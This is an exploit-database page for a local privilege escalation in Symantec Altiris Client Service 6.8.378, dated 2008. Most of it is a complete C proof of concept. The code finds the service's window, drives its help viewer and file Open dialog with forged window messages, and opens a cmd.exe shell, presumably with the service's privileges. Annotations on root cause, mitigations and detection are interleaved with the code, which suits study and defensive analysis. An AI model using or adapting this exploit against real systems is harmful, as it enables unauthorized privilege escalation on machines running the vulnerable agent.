
Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation

Published: 15 May 2008 00:00:00 | Reported by: Alex Hernandez | Type: exploitdb | Source: www.exploit-db.com | Views: 23

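Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation 0day exploit by sirdarckcat & alt3kx. The proof-of-concept below sends window messages (its banner names WM_COMMANDHELP) to a window titled "Altiris Client Service" and, per the same banner, is based on the MS04-019 Utility Manager exploit; the underlying weakness is a privileged service exposing a window on the interactive user's desktop.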

Code
// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day) 
//
// Affected Versions	: Altiris Client 6.5.248
//			  Altiris Client 6.5.299
//			  Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx 
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat 
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include "stdio.h"
#include "windows.h"

// Proof-of-concept entry point. It locates the window titled
// "Altiris Client Service", sends it window messages so that a help viewer
// and then a file "Open" dialog appear, and drives that dialog with further
// messages until a window titled with the cmd.exe path exists.
//
// Defender notes:
//  - Root cause (message-based "shatter" class, as in the MS04-019 exploit the
//    banner cites): window messages carry no sender identity, so any process
//    on the same desktop can drive a window owned by a service. The service
//    presumably runs under a more privileged account (the page title calls
//    this a privilege escalation) - confirm for the deployed agent.
//  - Mitigation: privileged services should not create windows on the
//    interactive desktop. Session 0 isolation (Windows Vista and later) keeps
//    service windows off the user's desktop, and UIPI blocks messages sent
//    from lower- to higher-integrity processes. A vendor-fixed agent version
//    is not stated on this page.
//  - Detection: a help viewer or cmd.exe created as a child of the agent's
//    service process is the observable outcome (process names are not given
//    on this page).
//
// argv[1] is an optional primary language id (decimal) used to pick the
// localized window titles. Always returns 0, on failure as well as success.
int main(int argc, char* argv[])
{
 HWND lHandle, lHandle2;
 POINT point;
 // id: primary language id; a: set to 1 after the context-menu step has
 // been retried once.
 int id,a=0;
 // Localized window titles indexed by primary language id. Only rows 0x09
 // (English), 0x0a (Spanish) and 0x0c (French) are filled in below; every
 // other row is uninitialized stack memory.
 char langH[255][255];
 char langO[255][255];
 char wname[]="Altiris Client Service";
 
 // Title of the help viewer window per language.
 strcpy(langH[0x0c],"Aide de Windows");
 strcpy(langH[0x09],"Windows Help");
 strcpy(langH[0x0a],"Ayuda de Windows");
 
 // Title of the file "Open" dialog per language.
 strcpy(langO[0x0c],"Ouvrir");
 strcpy(langO[0x09],"Open");
 strcpy(langO[0x0a],"Abrir");
 
 printf("##########################################################\n");
 printf("#                  Altiris Client Service                #\n");
 printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit    #\n");
 printf("# by sirdarckcat & alt3kx                                #\n");
 printf("#                                                        #\n");
 printf("# This exploit is based on www.milw0rm.com/exploits/350  #\n");
 printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
 printf("# by Cesar Cerrudo                                       #\n");
 printf("##########################################################\n\n");
  
 // Start from the system default language. As written, English (9) is forced
 // only when the system id is 0 AND the user id is non-zero; the message
 // text suggests a different intent.
 id=PRIMARYLANGID(GetSystemDefaultLangID());
 if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
    printf("Lang not found, using english\n");
    id=9;
 }

 // Text later placed into the dialog control with id 0x47C. It ends in '?',
 // i.e. it is a wildcard pattern rather than a complete file name.
 char sText[]="%windir%\\system32\\cmd.ex?";

 // With no argument the program only prints usage and exits.
 if (argc<2){
    printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
    printf("Look for your LANG-ID here:\n");
    printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
    printf("\nAnyway, the program will try to guess it.\n\n");
    return 0;
 }else{
    if (argc==2){
       // NOTE(review): langH[n] is an array row and decays to a non-null
       // pointer, so this test is always true; the argv-derived index is
       // also not range-checked, so a value outside 0..254 indexes past
       // the arrays wherever id is used below.
       if (langH[atoi(argv[1])]){
          id=atoi(argv[1]);
          printf("Lang changed\n");
       }else{
          // Unreachable given the test above; the format string also has no
          // conversion for the extra id argument.
          printf("Lang not supported\n",id);
       }
    }
 }
 printf("Using Lang %d\n",id);
 printf("Looking for %s..\n",wname);
 // Top-level window lookup by title only; any process on the same desktop
 // can do this.
 lHandle=FindWindow(NULL, wname);   
 if (!lHandle) {
  printf("Window %s not found\n", wname);
  return 0;
 }else{
  printf("Found! exploiting..\n");
 }
 // 0x313 is not a documented WM_* constant - presumably the undocumented
 // system-menu popup message; confirm.
 PostMessage(lHandle,0x313,NULL,NULL);
 
 Sleep(100);

 // 0x365 is the message the banner calls WM_COMMANDHELP (MFC's private help
 // request); the following code expects a help viewer window to appear.
 SendMessage(lHandle,0x365,NULL,0x1);
 Sleep(300);
 // Look for the help viewer by its localized title; retry once with the
 // English title before giving up.
 pp:
 if (!FindWindow(NULL, langH[id])){
    printf("Help Window not found.. exploit unsuccesful\n");
    if (id!=9){
       printf("Trying with english..\n");
       id=9;
       goto pp;
    }else{
          return 0;
    } 
 }else{
    printf("Help Window found! exploiting..\n");
 } 
 // A Return key message is sent to the help viewer; the next lookup expects
 // a dialog ("#32770" is the standard dialog window class) titled "Open".
 SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
 Sleep(500);
 // None of the handles obtained from here on are checked for NULL.
 lHandle = FindWindow("#32770",langO[id]);
 // 0x47C: presumably the file-name field of the common Open dialog -
 // confirm against dlgs.h.
 lHandle2 = GetDlgItem(lHandle, 0x47C);
 Sleep(500);
 printf("Sending path..\n");
 // WM_SETTEXT sets the control's text from this process; the receiving
 // window cannot tell the message from genuine user input.
 SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
 Sleep(800);
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
 // 0x4A0: another control id in the same dialog - meaning not shown here.
 lHandle2 = GetDlgItem(lHandle, 0x4A0);
 printf("Looking for cmd..\n"); 
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
 Sleep(500);
 // SHELLDLL_DefView is the class name looked up for the dialog's file-list
 // view; its child with id 0x1 receives the key messages below.
 lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
 lHandle2 = GetDlgItem(lHandle2, 0x1);
 printf("Sending keys..\n");
 // 0x43, 0x4D, 0x44 are the key codes for 'C', 'M', 'D'.
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
 Sleep(500);
 // Retry point: the context-menu step below is attempted at most twice.
 mark:
 PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
 Sleep(1000);
 // Hard-coded screen coordinates: the window at (10,30) is assumed to be
 // the context menu that was just requested.
 point.x =10; point.y =30;
 lHandle2=WindowFromPoint(point);
  Sleep(1000);
 printf("Opening shell..\n");
 // Two Down keys and Return are sent to the window found at that point.
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
  Sleep(1000);
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
  Sleep(1000);
 SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
  Sleep(1000);
 // Success is judged solely by the existence of a window titled with the
 // cmd.exe path under C:\WINDOWS or C:\WINNT.
 if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
    printf("Failed\n");
    if (!a){
        a++;
        goto mark;
    }
 }else{
       printf("Done!\n");
 }
 // Cleanup runs only when no retry was needed: close the Open dialog and the
 // help viewer. The last call looks up a window titled with the LANG-ID
 // argument string, which is unlikely to match any window.
 if(!a){
    SendMessage (lHandle, WM_CLOSE,0,0);
    Sleep(500);
    SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
    SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
 }else{
    printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
 }
 return 0;
}

// milw0rm.com [2008-05-15]


15 May 2008 00:00 - Current
Vulners AI Score: 7.4 (High risk)
Views: 23